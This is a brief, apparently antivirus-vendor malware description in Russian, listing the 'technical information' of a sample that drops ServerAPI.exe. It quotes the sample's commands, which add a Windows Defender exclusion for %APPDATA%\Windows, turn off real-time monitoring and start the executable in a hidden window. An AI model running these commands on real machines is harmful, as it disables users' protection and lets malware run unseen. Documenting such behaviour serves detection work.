Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath %APPDATA%\Windows
- %APPDATA%\windows\serverapi.exe
- '<SYSTEM32>\cmd.exe' /K "powershell -Command Add-MpPreference -ExclusionPath %APPDATA%\Windows && powershell Set-MpPreference -DisableRealtimeMonitoring $true && START %APPDATA%\Windows\ServerAPI.exe & EXIT" (со скрытым окном)